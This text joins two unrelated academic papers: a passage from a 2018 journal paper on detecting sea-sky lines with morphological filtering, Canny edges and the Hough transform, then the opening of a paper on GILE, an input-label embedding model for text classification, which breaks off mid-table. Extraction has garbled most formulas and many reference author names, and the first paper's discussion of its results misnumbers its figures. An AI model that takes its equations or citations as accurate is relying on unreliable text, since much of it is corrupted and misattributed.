and closing. The definition is shown in the formula (5).  ( ) ( )COF f f b b    The mathematical morphological filters have the properties of transitivity, translation invariance, idempotency and duality. The structure element chooses the larger square structure elements, because the noise element of uneven illumination and the strong watermark is larger. B. Edge Detection The edge detection by the Canny operator is a technology to extract useful structural information in different visual objects. And that greatly reduces the amount of data to be processed. It is now widely used in various computer vision systems. The Canny operators are used in different visual systems to detect edges, but the requirements on the edge detection are similar, so the wide application of edge detection technology can be realized[12]. For the grayscale image that has been preprocessed by the method of step 1, the gradient intensity and direction of each pixel in the image are calculated. The edges of the image can be directed to all directions, so the Canny algorithm uses four operators to detect the horizontal, vertical and diagonal border in the image. The operator of edge detection returns the first order value of horizontal Gx and vertical Gy direction, thereby the gradient G and direction theta of pixels can be determined, as shown in formula (6) and formula (7).     In formula (6),G is gradient strength. In formula (7), the is an inverse tangent function.Besides, the theta represents gradient direction The Non-Maximum Suppression is applied to eliminate the spurious response that is caused by edge detection. The Double-Threshold detection is used to determine the real and potential edges. Finally, the edge detection is completed by suppressing isolated weak edges. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 89 The Canny operator is used to extract edges, so that all possible edges can be obtained to ensure the accuracy of edges. C. Interference Point Removal After using the Canny operator to extract the edges, the images with two value are obtained. There are still a lot of small noise points in the the images with two value. That causes interference to the next detection and fitting of sea- sky lines. Therefore, we use the mathematical morphology operation to remove interference points. Because the mathematical morphological operation is sensitive to the size and shape of structural elements, the appropriate structural elements must be selected. Meanwhile, because the target is to obtain a sea-sky line, so the linear structure element is used to remove the noise points, so that the interference points can be removed .At the same time, the edge points of the target are not mistakenly removed [13 ]. The linear structural elements used in this paper are shown in the formula (8).  (' ', , )se strel line x y  In formula (8), these character se represents the structure element, and the strel() is the function that created the structure element. In which, the ‘line’ represents a linear structure element, Meanwhile, the x and y determine the size and direction of the structure element that we choosed. Of which the linear structure element x and y have the following relationship, as shown in formula (9):  2 1 1,2,3,... 90 /( - 1) 为单位角度 * 0,1,...4 1 x N N q n y n q n N             According to the characteristics of sea-sky line, this paper selects the linear structural elements, which can effectively remove interference points ,reduce amount of calculation in Hough line detection and improve its accuracy and efficiency. D. Line Detection The basic idea of the Hough transformation is the duality of the point to the line. After the image transformation, the images in the image space are transformed into the parameter space [14]. In the x-y image space, a straight line BAxy  (Of which, A is the slope, B is intercept) corresponds the points in the  - parameter space. ρ θ y x 1 2 3 Figure 4. The image space In the image space, the point on a straight line is a sinusoidal curve in the Hough parameter space; Many points on the same line in the image space are a sinusoidal cluster in the Hough parameter space and the curve clusters are intersected to a point, which is called the peak point. The peak point in the Hough parameter space corresponds to a straight line in the image space. As shown in Fig.4, this is the image space; As shown in Fig.5, this is the parameter space. The Hough transformation is converted from the image space of Fig. 4 to the parameter space of Fig.5. ρ θ p 1 2 3 Figure 5. The parameter space Therefore , Therefore, the Hough transformation transforms the straight line detection problems in the image space to the points detection in the parameter space. There are a number of possible lines in the sea-sky image, but the sea-sky line is throughout the image .Thus, the sea-sky line is The longest line segment in the sea-sky image, corresponding the local maximum value in the Hough parameter space. By detecting the local maximum in the Hough parameter space, we can find a corresponding line in the x-y image space, that is, the sea-sky line [15] . E. Straight line fitting Through the Hough Line detection, the longest line segment is extracted. However, the sea sky line is a straight line through the whole picture. So we have to extract and fit the points in the line segment and get the final sea-sky line. through the whole image. The sea-sky line is gotted by selecting some points and making straight line fitting by the least square method. In this paper, the least square method is used to fit the straight line. The least square method is a mathematical optimization technique. It searches for the best function matching of data by minimizing the sum of squares of errors. The least squares method can be used to obtain the  is the unit Augle International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 90 unknown data simply and make the sum of squares between the obtained data and the actual data minimum. IV. EXPERIMENT AND RESULT ANALYSIS To verify the results of this method, we selected three sea-sky background images in different environments, as shown in the Fig.6 .The Fig. (a) is a sea-sky image with lower visibility; The Fig. (b) is a sea-sky image with strong watermark; The Fig. (c) is a sea-sky image with uneven illumination. After the operations are performed on the matlab 2015a software, two mathematical morphological processing cases are compared and analyzed. The mathematical morphology operations are used in the pretreatment of sea-sky image.Two preprocessing methods are used. One way is to use the Gauss filter to reduce noise and then conduct sea-sky lines detection. The results are shown in Fig.7 . The other way is using the mathematical morphological filter to reduce noise and then conduct the sea- sky line detection, the results are shown in Fig.8 . As seen from the Fig. 7(b), the former method is not ideal for detecting sea-sky pictures with strong water marks, and there is an error. From the fig. 8 , we can see that the method of this paper can accurately detect the sea-sky line in different environment. (a) (b) (c) Figure 6. Original picture of sea-sky background (a) (b) (c) Figure 7. Sea-sky-line detected after Gauss filter processing (a) (b) (c) Figure 8. Sea-sky-line detected after mathematical morphological processing The images are results of sea-sky lines detection in Fig.8.The sea-sky-line detected by the algorithm in this paper .In order to measure the processed image quality, we usually refer to the PSNR value to determine whether a particular processing program is satisfactory enough.Thus, to quantitatively evaluate the experiment results, the experiment performance of the sea-sky line detection in three sea-sky backgound images are compared. The peak signal to noise ratio (PSNR) is used. The PSNR is the ratio of the variance to the information and noise, when the value of International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 91 PSNR is between the 30dB and 40dB,which means less noise. When the value of PSNR is 40dB ,which means better picture processing effect [16]. The expression of the PSNR is shown in the formula(10). MSE f PSNR 2 maxlg10  In which, max f is the maximum grayscale value of function ),( yxf . MSE is a mean-square error that reflects the variance between the estimate and the estimated amount, as shown in the formula (11).  MN yxfyxg MSE M x N y        1 0 1 0 2 )],(),([  The obtained quantitative evaluation experiment data are shown in Table 1. TABLE I. COMPARISON OF PNSR VALUES OF EXPERIMENTAL RESULTS Image processed by Gaussian filter Image processed by filters in This paper MSE PNSR /dB MSE PNSR /dB Fig.6 (a) 5.5771 37.6667 9.2155 38.4856 Fig.6 (b) 17.3281 35.7433 26.4623 33.9045 Fig.6 (c) 74.8766 29.3873 36.0083 32.5571 From the numerical change of PSNR in Table 1, we can see that the quality of the picture is in high level in most cases ,for the sea-sky background pictures are processed by the Gauss filter. However, from Fig. 6 (c), we can see that the value of PNSR is lower than 30 dB. Thus, for the unevenly illuminated sea- sky background pictures, the Gauss filter can not effectively process and solve the uneven illumination problem; For Fig. 7 (b), the PSNR values of the pictures after the Gauss filter processing are higher than the result of the pictures after the mathematical morphological filter processing. As a result, it can be seen that the quality the pictures after the Gauss filter processing is relatively higher than that after morphological filter processing. It is also shown that the Gauss filter can effectively remove the interference of strong watermarks on the image processing. However, according to the Fig.6 (b) effect diagram of the sea-sky lines detection after the Gauss filter processing, it is known that although the pictures are processed by the Gauss filter. They get better quality of the images. It effectively removes the interference of the strong watermarks, but also loses more detail information of the edge of the sea and the sky, so that the effective points of the edge are also erroneously removed. There is not an accurate sea-sky line to be obtained . As seen from the Table 1, the PSNR values of the images that are processed by the mathematical morphological filter in this paper are all between 30 dB and 40 dB, which indicates that the image processing quality is better. At the same time, combining with figure 8, we can know that the algorithm in this paper can effectively preserve the details of the sea-sky boundary by the algorithm in this paper. The more accurate sea-sky lines can be obtained. The sea-sky lines in different sky-sea background images are measured. It objectively reflects the feasibility and superiority of the algorithm in this paper. The mathematical morphology is applied to the interference point removal after edge detection by the Canny operator .After the interference points are removed, the Hough transformation is used to extract the sea-sky lines so as to achieve the final detection and fitting of the sea-sky lines .We get the detection result of the sea-sky lines finally,as shown in Fig. 8 . We obtain the two-value pictures after edge detection by the Canny operators.Thus, the mathematical morphology is applied to the two-value pictures.The experimental data of Table 2 are analyzed by comparing the number of effective points reserved before and after second mathematical morphology processing in the experiment. TABLE II. NUMBER COMPARISON OF VALID POINT BEFORE AND MATHEMATICAL MORPHOLOGY PROCESSING Possible points A valid points B Ratio b/a Time- consuming /ms Fig.6 (a) 100 28 28% 688 Fig.6 (b) 590 252 42.7% 674 Fig.6 (c) 102 72 70.6% 708 From table 2 , it can be seen that after the second morphological processing ,based on the special structure element, the interference points of the sea-sky lines can be reduced effectively. Because of the edge extraction using the Canny operator, all the possible edges are detected. However, only one of the required sea-sky line is needed. At the same time, some interference points are produced when the edge detection is performed. These are unavoidable. Under the premise of guaranteeing the valid the sea-sky line information point ratio (B/A), the effective detail of sea-sky lines are protected, the possible points (A) are effectively reduced . From the data change in Table 2, we can see that the interference information produced by edge extraction is the lower for images with lower visibility. For images with uneven illumination, there are more interference information produced by the operation of preprocessing and edge extraction. These interference information will cause the interference problems on straight line detection and fitting. That makes the sea –sky line extraction difficult and inaccurate. At the same time, it shortens the time of straight line detection and improves the efficiency of the algorithm in this paper. The mathematical morphologic is used, the computation amount of Hough detection is reduced. Meanwhile, the algorithm in this paper reduces the interference on the sea-sky line fitting. Thus, the algorithm in this paper ensures the efficiency and accuracy of the sea-sky line detection. Therefore, the method of this paper achieves the expected effect and the extraction effect of sea-sky lines is ideal. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 92 V. CONCLUSION This paper presents a method of the sea-sky line detection based on the mathematical morphological. Firstly, the image is preprocessed by mathematical morphological filtering. Followed that, the Canny operator is used to extract the sea-sky boundary. Secondly, the Mathematical morphology processing is once more used to remove the interference points on the sea-sky line; Finally, the sea-sky line is detected by the Hough transform and fitted by the least square method. The experimental results show that, this algorithm can detect the sea-sky lines, as well as the robustness is better, accuracy is higher. It can effectively cope with the complex marine environment and weather effects. REFERENCES [1] Messages , Zhengjia , under combined .Sea-sky line detection algorithm based on morphological processing and least square method [J]. Optics and Optoelectronic Technology , 2013, one (1): 000091-94. [2] Liang D, Zhang W, Huang Q, et al. Robust sea-sky-line detection for complex sea background[C]// IEEE International Conference on Progress in Informatics and Computing. IEEE, 2016:317-321.. [3] H. Wang，Z. Wei，S. Wang，et al. A Vision － based Obstacle Detection System for Unmanned Surface Vehicle［C］/ /Proceeding of the 2011 IEEE Conference on Ｒ obotics ， Automation and Mechatronics，2011: 364 ～ 369. [4] Wang Bo, Su Yumin, Wan Lei, et al. Sea sky detection method based on gradient saliency for surface unmanned craft [J]. Acta optica Sinica, 2016 (5): 66-75. [5] Dryden , Zhang . Xinggang. A method of periodic noise removal based on weights adaptive Morphology [J/ol]. Computer technology and Development , 2018 (a): 1-8[2018-04-25]. [6] Jiang L, Guo Y. Image Edge detection based on adaptive weighted morphology[j]. Chinese Optics Letters, 2007, 5 (2): 77-78. [7] Feng Gui, GUI pre- , , Wind, Lin . . Morphological method in edge detection of gray image [J]. Remote sensing information , 3:12-14,. [8] Wanghuifeng , War Guile , Luo . Xiaoming. Research and application of edge detection algorithm based on mathematical morphology [J]. Computer Engineering and Applications , 2009 (9): 223-226. [9] Zhong Junliang. . Real-time detection and tracking technology of infrared small and dim targets [D]. Graduate School of Chinese Academy of Sciences ( Changchun Institute of Optics and Fine mechanics and Physics , 2013. [10] Wang Fang , Changwei , Li . Wenshu. Image edge extraction method based on mathematical morphology [J]. Mechanical Engineering and Automation , 2015 (1): 46-48. [11] Li Mu, Chi ge, etc. Adaptive Canny operator Edge detection technology [J]. Journal of Harbin Engineering University, 2007, (9): 1002-1007. [12] Wang Guangling. . Research on the algorithm of detecting and tracking video velocity based on moving objects [D]. Taiyuan University of Technology , 2009. [13] Zhanghuang , , Yu Shenglin, Bai Bangong. selecting principles for structural elements in morphological image denoising [J]. Data acquisition and processing , 2008, S1:81-83. [14] Dong Yu Star, Liu , Weining, dongyu-xing, , . . Small target detection for Sea-sky background based on Gray character [J]. China Optics , 3 (3): 252-256. [15] Lu Junwei, Wang , Xiaodong,, and . on. Sea-sky line detection algorithm based on fractal feature and Hough transform [J]. Journal of the Naval Institute of Aeronautical Engineering , 2006 (5): 545-548. [16] Xu Tianji , Zhang Guican, Jack. , . Watershed color Image segmentation based on morphological gradients [J]. Computer Engineering and Applications , 2016, (one): 200-203 work_ms5ojw7dunfmhanpja5c5cgjse ---- GILE: A Generalized Input-Label Embedding for Text Classification Nikolaos Pappas James Henderson Idiap Research Institute, Martigny 1920, Switzerland {nikolaos.pappas,james.henderson@idiap.ch} Abstract Neural text classification models typically treat output labels as categorical variables which lack description and semantics. This forces their parametrization to be depen- dent on the label set size, and, hence, they are unable to scale to large label sets and generalize to unseen ones. Existing joint input-label text models overcome these is- sues by exploiting label descriptions, but they are unable to capture complex label re- lationships, have rigid parametrization, and their gains on unseen labels happen often at the expense of weak performance on the labels seen during training. In this paper, we propose a new input-label model which generalizes over previous such models, ad- dresses their limitations, and does not com- promise performance on seen labels. The model consists of a joint non-linear input- label embedding with controllable capacity and a joint-space-dependent classification unit which is trained with cross-entropy loss to optimize classification performance. We evaluate models on full-resource and low- or zero-resource text classification of multilin- gual news and biomedical text with a large label set. Our model outperforms monolin- gual and multilingual models which do not leverage label semantics and previous joint input-label space models in both scenarios. 1 Introduction Text classification is a fundamental NLP task with numerous real-world applications such as topic recognition (Tang et al., 2015; Yang et al., 2016), sentiment analysis (Pang and Lee, 2005; Yang et al., 2016), and question answering (Chen et al., 2015; Kumar et al., 2015). Classification also ap- pears as a sub task for sequence prediction tasks such as neural machine translation (Cho et al., 2014; Luong et al., 2015), and summarization (Rush et al., 2015). Despite the numerous stud- ies, existing models are trained on a fixed label set using k-hot vectors and, therefore, treat target labels as mere atomic symbols without any partic- ular structure to the space of labels, ignoring po- tential linguistic knowledge about the words used to describe the output labels. Given that seman- tic representations of words have been shown to be useful for representing the input, it is reason- able to expect that they are going to be useful for representing the labels as well. Previous work has leveraged knowledge from the label texts through a joint input-label space, initially for image classification (Weston et al., 2011; Mensink et al., 2012; Frome et al., 2013; Socher et al., 2013). Such models generalize to labels both seen and unseen during training, and scale well on very large label sets. However, as we explain in Section 2, existing input-label models for text (Yazdani and Henderson, 2015; Nam et al., 2016) have the following limitations: (i) their em- bedding does not capture complex label relation- ships due to its bilinear form, (ii) their output layer parametrization is rigid because it depends on the dimensionality of the encoded text and labels, and, (iii) they are outperformed on seen labels by clas- sification baselines trained with cross-entropy loss (Frome et al., 2013; Socher et al., 2013). In this paper, we propose a new joint input-label model which generalizes over previous such mod- els, addresses their limitations, and does not com- promise performance on seen labels (see Figure 1). The proposed model is comprised of a joint non-linear input-label embedding with control- lable capacity and a joint-space-dependent classi- fication unit which is trained with cross-entropy loss to optimize classification performance.1 The need for capturing complex label relationships is addressed by two non-linear transformations which have the same target joint space dimension- 1Our code is available at: github.com/idiap/gile github.com/idiap/gile ality. The parametrization of the output layer is not constrained by the dimensionality of the in- put or label encoding, but is instead flexible with a capacity which can be easily controlled by choos- ing the dimensionality of the joint space. Training is performed with cross-entropy loss, which is a suitable surrogate loss for classification problems, as opposed to a ranking loss such as WARP loss (Weston et al., 2010) which is more suitable for ranking problems. Evaluation is performed on full-resource and low- or zero-resource scenarios of two text clas- sification tasks, namely on biomedical semantic indexing (Nam et al., 2016) and on multilingual news classification (Pappas and Popescu-Belis, 2017) against several competitive baselines. In both scenarios, we provide a comprehensive abla- tion analysis which highlights the importance of each model component and the difference with previous embedding formulations when using the same type of architecture and loss function. Our main contributions are the following: (i) We identify key theoretical and practical lim- itations of existing joint input-label models. (ii) We propose a novel joint input-label embed- ding with flexible parametrization which gen- eralizes over the previous such models and addresses their limitations. (iii) We provide empirical evidence of the supe- riority of our model over monolingual and multilingual models which ignore label se- mantics, and over previous joint input-label models on both seen and unseen labels. The remainder of this paper is organized as fol- lows. Section 2 provides background knowledge and explains limitations of existing models. Sec- tion 3 describes the model components, training and relation to previous formulations. Section 4 describes our evaluation results and analysis, while Section 5 provides an overview of previous work and Section 6 concludes the paper and pro- vides future research directions. 2 Background: Neural Text Classification We are given a collection D = {(xi,yi), i = 1, . . . ,N} made of N documents, where each document xi is associated with labels yi = {yij ∈ {0, 1} | j = 1, . . . ,k}, and k is the total number of labels. Each document xi = {w11,w12, . . . ,wKiTKi} is a sequence of words grouped into sentences, with Ki being the num- ber of sentences in document i and Tj being the number of words in sentence j. Each label j has a textual description comprised of multiple words, cj = {cj1,cj2, . . . ,cjLj | j = 1, . . . ,k} with Lj being the number of words in each description. Given the input texts and their associated labels seen during the training portion of D, our goal is to learn a text classifier which is able to predict labels both in the seen, Ys, or unseen, Yu, label sets, defined as the sets of unique labels which have been seen or not during training respectively and, hence, Y ∩Yu = ∅ and Y = Ys ∪Yu.2 2.1 Input Text Representation To encode the input text, we focus on hierarchical attention networks (HANs), which are competitive for monolingual (Yang et al., 2016) and multilin- gual text classification (Pappas and Popescu-Belis, 2017). The model takes as input a document x and outputs a document vector h. The input words and label words are represented by vectors in IRd from the same3 embeddings E ∈ IR|V|×d, where V is the vocabulary and d is the embedding dimension; E can be pre-trained or learned jointly with the rest of the model. The model has two levels of abstraction, word and sentence. The word level is made of an encoder network gw and an attention network aw, while the sentence level similarly in- cludes an encoder and an attention network. Encoders. The function gw encodes the sequence of input words {wit | t = 1, . . . ,Ti} for each sen- tence i of the document, noted as: h(it)w = gw(wit), t ∈ [1,Ti], (1) and at the sentence level, after combining the in- termediate word vectors {h(it)w | t = 1, . . . ,Ti} to a sentence vector si ∈ IRdw (see below), where dw is the dimension of the word encoder, the func- tion gs encodes the sequence of sentence vectors {si | i = 1, . . . ,K}, noted as h (i) s . The gw and gs functions can be any feed-forward (DENSE) or recurrent networks, e.g. GRU (Cho et al., 2014). Attention. The αw and αs attention mechanisms, which estimate the importance of each hidden 2Note that depending on the number of labels per docu- ment the problem can be a multi-label or multi-class problem. 3This statement holds true for multilingual classification problems too if the embeddings are aligned across languages. state vector, are used to obtain the sentence si and document representation h respectively. The sen- tence vector is thus calculated as follows: si = Ti∑ t=1 α(it)w h (it) w = Ti∑ t=1 exp(v>ituw)∑ j exp(v > ijuw) h(it)w , (2) where vit = fw(h (it) w ) is a fully-connected net- work with Ww parameters. The document vector h ∈ IRdh , where dh is the dimension of the sen- tence encoder, is calculated similarly, by replacing uit with vi = fs(h (i) s ) which is a fully-connected network with Ws parameters, and uw with us, which are parameters of the attention functions. 2.2 Label Text Representation To encode the label text we use an encoder func- tion which takes as input a label description cj and outputs a label vector ej ∈ IRdc ∀j = 1, . . . , k. For efficiency reasons, we use a simple, parameter- free function to compute ej , namely the average of word vectors which describe label j, namely ej = 1 Lj ∑Lj t=1 cjt, and hence dc = d in this case. By stacking all these label vectors into a ma- trix, we obtain the label embedding E ∈ IR|Y|×d. In principle, we could also use the same encoder functions as the ones for input text, but this would increase the computation significantly; hence, we keep this direction as future work. 2.3 Output Layer parametrizations 2.3.1 Typical Linear Unit The most typical output layer, consists of a linear unit with a weight matrix W ∈ IRdh×|Y| and a bias vector b ∈ IR|Y| followed by a softmax or sigmoid activation function. Given the encoder’s hidden representation h with dimension size dh, the probability distribution of output y given input x is proportional to the following quantity: p(y|x) ∝ exp(W>h + b). (3) The parameters in W can be learned separately or be tied with the parameters of the embedding E by setting W = ET if the input dimension of W is restricted to be the same as that of the embedding E (d = dh) and each label is represented by a single word description i.e. when Y corresponds to V and E = E. In the latter case, Eq. 3 becomes: p(y|x) ∝ exp(Eh + b). (4) Either way, the parameters of such models are typ- ically learned with cross-entropy loss, which is suitable for classification problems. However, in both cases they cannot be applied to labels which are not seen during training, because each label has learned parameters which are specific to that label, so the parameters for unseen labels cannot be learned. We now turn our focus to a class of models which can handle unseen labels. 2.3.2 Bilinear Input-Label Unit Joint input-output embedding models can gener- alize from seen to unseen labels because the pa- rameters of the label encoder are shared. The previously proposed joint input-output embedding models by Yazdani and Henderson (2015) and Nam et al. (2016) are based on the following bi- linear ranking function f(·): f(x,y) = EWh, (5) where E ∈ IR|Y|×d is the label embedding and W ∈ IRd×dh is the bilinear embedding. This func- tion allows one to define the rank of a given label y with respect to x and is trained using hinge loss to rank positive labels higher than negative ones. But note that the use of this ranking loss means that they do not model the conditional probability, as do the traditional models above. Limitations. Firstly, the above formula can only capture linear relationships between encoded text (h) and label embedding (E) through W. We argue that the relationships between different labels are non-linear due to the complex interactions of the semantic relations across labels but also between labels and different encoded inputs. A more ap- propriate form for this purpose would include a non-linear transformation σ(·), e.g. with either: (a) σ(EW)︸︷︷︸ Label structure h or (b) E σ(Wh)︸︷︷︸ Input structure . (6) Secondly, it is hard to control their output layer capacity due to their bilinear form, which uses a matrix of parameters (W) whose size is bounded by the dimensionalities of the label embedding and the text encoding. Thirdly, their loss function optimizes ranking instead of classification perfor- mance and thus treats the ground-truth as a ranked list when in reality it consists of one or more inde- pendent labels. Summary. We hypothesize that these are the rea- sons why these models do not yet perform well on seen labels compared to models which make use of the typical linear unit, and they do not take full advantage of the structure of the problem when tested on unseen labels. Ideally, we would like to have a model which will address these issues and will combine the benefits from both the typical lin- ear unit and the joint input-label models. 3 The Proposed Output Layer Paramet- rization for Text Classification We propose a new output layer parametrization for neural text classification which is comprised of a generalized input-label embedding which captures the structure of the labels, the structure of the en- coded texts and the interactions between the two, followed by a classification unit which is indepen- dent of the label set size. The resulting model has the following properties: (i) it is able to cap- ture complex output structure, (ii) it has a flexi- ble parametrization which allows its capacity to be controlled, and (iii) it is trained with a classi- fication surrogate loss such as cross-entropy. The model is depicted in Figure 1. In this section, we describe the model in detail, showing how it can be trained efficiently for arbitrarily large label sets and how it is related to previous models. 3.1 A Generalized Input-Label Embedding Let gin(h) and gout(ej) be two non-linear projec- tions of the encoded input, i.e. the document h, and any encoded label ej, where ej is the jth row vector from the label embedding matrix E, which have the following form: e′j = gout(ej) = σ(ejU + bu) (7) h′ = gin(h) = σ(V h + bv), (8) where σ(·) is a nonlinear activation function such as ReLU or Tanh, the matrix U ∈ IRd×dj and bias bu ∈ IRdj are the linear projection of the labels, and the matrix V ∈ IRdj×dh and bias bv ∈ IRdj are the linear projection of the encoded input. Note that the projections for h′ and e′j could be high- rank or low-rank depending on their initial dimen- sions and the target joint space dimension. Also let E′ ∈ IR|Y|×dj be the matrix resulting from pro- jecting all the outputs ej to the joint space, i.e. gout(E). The conditional output probability distribution h' e2 U V ∧h' e1 Classification unit w y1 ∧y2 … Joint space h' ek yk ∧ … Label Encoder cj1 cj2 cjLj ... ei Input Encoder w11 w12 wKiTKi ... h Encoders dh x dj d x dj W or d em be dd ing s ' ' ' T Figure 1: Each encoded text and label are projected to a joint input-label multiplicative space, the output of which is processed by a classification unit with label- set-size independent parametrization. can now be re-written as: p(y|x) ∝ exp ( E′h′ ) ∝ exp ( gout(E)gin(h) ) ∝ exp ( σ(EU + bu)︸︷︷︸ Label Structure σ(V h + bv)︸︷︷︸ Input Structure ) . (9) Crucially, this function has no label-set-size de- pendent parameters, unlike W and b in Eq. 3. In principle, this parametrization can be used for both multi-class and multi-label problems by defining the exponential in terms of a softmax and sigmoid functions respectively. However, in this paper we will focus on the latter. 3.2 Classification Unit We require that our classification unit parameters depend only on the joint input-label space above. To represent the compatibility between any en- coded input text hi and any encoded label ej for this task, we define their joint representation based on multiplicative interactions in the joint space: g (ij) joint = gin(hi) �gout(ej), (10) where � is component-wise multiplication. The probability for hi to belong to one of the k known labels is modeled by a linear unit which maps any point in the joint space into a score which indicates the validity of the combination: p (ij) val = g (ij) jointw + b, (11) where w ∈ IRdj and b are a scalar variables. We compute the output of this linear unit for each known label which we would like to predict for a given document i, namely: P (i) val =   p (i1) val p (i2) val . . . p (ik) val   =   g (i1) jointw + b g (i2) jointw + b . . . g (ik) jointw + b   . (12) For each row, the higher the value the more likely the label is to be assigned to the document. To ob- tain valid probability estimates and be able to train with binary cross-entropy loss for multi-label clas- sification, we apply a sigmoid function as follows: ŷi = p̂(yi|xi) = 1 1 + e−P (i) val . (13) Summary. By adding the above changes to the general form of Eq. 9 the conditional probabil- ity p(yi|xi) is now proportional to the following quantity: exp ( σ(EU + bu)(σ(V h + bv) �w) + b ) . (14) Note that the number of parameters in this equa- tion is independent of the size of the label set, given that U, V , w and b depend only on dj, and k can vary arbitrarily. This allows the model to scale up to large label sets and generalize to un- seen labels. Lastly, the proposed output layer ad- dresses all the limitations of the previous models, as follows: (i) it is able to capture complex struc- ture in the joint input-output space, (ii) it provides a means to easily control its capacity dj, and (iii) it is trainable with cross-entropy loss. 3.3 Training Objectives The training objective for the multi-label classifi- cation task is based on binary cross-entropy loss. Assuming θ contains all the parameters of the model, the training loss is computed as follows: L(θ) = − 1 Nk N∑ i=1 k∑ j=1 H(yij, ŷij), (15) where H is the binary cross-entropy between the gold label yij and predicted label ŷij for a docu- ment i and a candidate label j. We handle multiple languages according to Fi- rat et al. (2016) and Pappas and Popescu-Belis (2017). Assuming that Θ = {θ1,θ2, ...,θM} are all the parameters required for each of the M lan- guages, we use a joint multilingual objective based on the sum of cross-entropy losses: L(Θ) = − 1 Z Ne∑ i M∑ l k∑ j=1 H(y(l)ij , ŷ (l) ij ), (16) where Z = NeMk with Ne being the num- ber of examples per epoch. At each iteration, a document-label pair for each language is sam- pled. In addition, multilingual models share a certain subset of the encoder parameters during training while the output layer parameters are kept language-specific, as described by Pappas and Popescu-Belis (2017). In this paper, we share most of the output layer parameters, namely the ones from the input-label space (U, V, bv, bu), and we keep only the classification unit parameters (w, b) language-specific. 3.4 Scaling Up to Large Label Sets For a very large number dj of joint-space di- mensions in our parametrization, the computa- tional complexity increases prohibitively because our projection requires a large matrix multiplica- tion between U and E, which depends on |Y|. In such cases, we resort to sampling-based training, by adopting the commonly used negative sampling method proposed by Mikolov et al. (2013). Let xi ∈ IRd and yik ∈ {0, 1} be an input-label pair and ŷik the output probabilities from our model (Eq. 14). By introducing the sets kpi and k n i , which contain the indices of the positive and negative la- bels respectively for the i-th input, the loss L(θ) in Eq. 15 can be re-written as follows: = − 1 Z N∑ i=1 k∑ j=1 [ yij log ŷij + ȳij log (1 − ŷij) ] = − 1 Z N∑ i=1 [ kpi∑ j=1 log ŷij + kni∑ j=1 log (1 − ŷij) ] , (17) where Z = Nk and ȳij is (1 − yij). To reduce the computational cost needed to evaluate ŷij for all the negative label set kni , we sample k ∗ la- bels from the negative label set with probability p = 1|kni | to create the set kni . This enables training on arbitrarily big label sets without increasing the computation required. By controlling the number of samples we can drastically speed up the train- ing time, as we demonstrate empirically in Sec- tion 4.2.2. Exploring more informative sampling methods, e.g. importance sampling, would be an interesting direction of future work. 3.5 Relation to Previous Parametrizations The proposed embedding form can be seen as a generalization over the input-label embeddings with a bilinear form, because its degenerate form is equivalent to the bilinear form of Eq. 5. In par- ticular, this can be simply derived if we set one of the two non-linear projection functions in the second line of Eq. 9 to be the identity function, e.g. gout(·) = I, set all biases to zero, and make the σ(.) activation function linear, as follows: σ(EU + bu)σ(V h + bv) = (EI) (V h) = EV h �, (18) where V by consequence has the same number of dimensions as W ∈ IRd×dh from the bilinear input-label embedding model of Eq. 5. 4 Experiments The evaluation is performed on large-scale biomedical semantic indexing using the BioASQ dataset, obtained by Nam et al. (2016), and on multilingual news classification using the DW cor- pus, which consists of eight language datasets ob- tained by Pappas and Popescu-Belis (2017). The statistics of these datasets are listed in Table 1. 4.1 Biomedical Text Classification We evaluate on biomedical text classification to demonstrate that our generalized input-label model scales to very large label sets and performs better than previous joint input-label models on both seen and unseen label prediction scenarios. 4.1.1 Settings We follow the exact evaluation protocol, data and settings of Nam et al. (2016), as described below. We use the BioASQ Task 3a dataset, which is a collection of scientific publications in biomedical research. The dataset contains about 12M docu- ments labeled with around 11 labels out of 27,455, which are defined according to the Medical Sub- ject Headings (MESH) hierarchy. The data was minimally pre-processed with tokenization, num- ber replacements (NUM), rare word replacements (UNK), and split with the provided script by year so that the training set includes all documents until 2004 and the ones from 2005 to 2015 were kept for the test set, this corresponded to 6,692,815 docu- ments for training and 4,912,719 for testing. For validation, a set of 100,000 documents were ran- domly sampled from the training set. We report the same ranking-based evaluation metrics as Nam et al. (2016), namely rank loss (RL), average pre- cision (AvgPr) and one-error loss (OneErr). Dataset Documents Labels abbrev. # count # words w̄d # count w̄l BioASQ 11,705,534 528,156 214 26,104 35.0 DW 598,304 884,272 436 5,637 2.3 – en 112,816 110,971 516 1,385 2.1 – de 132,709 261,280 424 1,176 1.8 – es 75,827 130,661 412 843 4.7 – pt 39,474 58,849 571 396 1.8 – uk 35,423 105,240 342 288 1.7 – ru 108,076 123,493 330 916 1.8 – ar 57,697 58,922 357 435 2.4 – fa 36,282 34,856 538 198 2.5 Table 1: Dataset statistics: #count is the number of documents, #words are the number of unique words in the vocabulary V, w̄d and w̄l are the average number of words per document and label respectively. Our hyper-parameters were selected on valida- tion data based on average precision as follows: 100-dimensional word embeddings, encoder, at- tention (same dimensions as the baselines), joint input-label embedding of 500, batch size of 64, maximum number of 300 words per document and 50 words per label, ReLU activation, 0.3% nega- tive label sampling, and optimization with ADAM until convergence. The word embeddings were learned end-to-end on the task.4 The baselines are the joint input-label models from Nam et al. (2016), noted as [N16], namely: • WSABIE+: This model is an extension of the original WSABIE model by Weston et al. (2011), which instead of learning a ranking model with fixed document features, it jointly learns features for documents and words, and is trained with the WARP ranking loss. • AiTextML: This model is the one proposed by Nam et al. (2016) with the purpose of learning jointly representations of docu- ments, labels and words, along with a joint input-label space which is trained with the WARP ranking loss. The scores of the WSABIE+ and AiTextML base- lines in Table 2 are the ones reported by Nam et al. (2016). In addition, we report scores of a word- level attention neural network (WAN) with DENSE encoder and attention followed by a sigmoid out- 4Here, the word embeddings are included in the parameter statistics because they are variables of the network. Model Layer form Dim Seen labels Unseen labels Params abbrev. output #count RL AvgPr OneErr RL AvgPr OneErr #count [N 16 ] WSABIE+ EWht 100 5.21 36.64 41.72 48.81 0.37 99.94 722.10M AiTextML avg EWht 100 3.54 32.78 25.99 52.89 0.39 99.94 724.47M AiTextML inf EWht 100 3.54 32.78 25.99 21.62 2.66 98.61 724.47M B as el in es WAN W>ht – 1.53 42.37 11.23 – – – 55.60M BIL-WAN [YH15] σ(EW)Wht 100 1.21 40.68 17.52 18.72 9.50 93.89 52.85M BIL-WAN [N16] EWht 100 1.12 41.91 16.94 16.26 10.55 93.23 52.84M O ur s GILE-WAN σ(EU)σ(V ht) 500 0.78 44.39 11.60 9.06 12.95 91.90 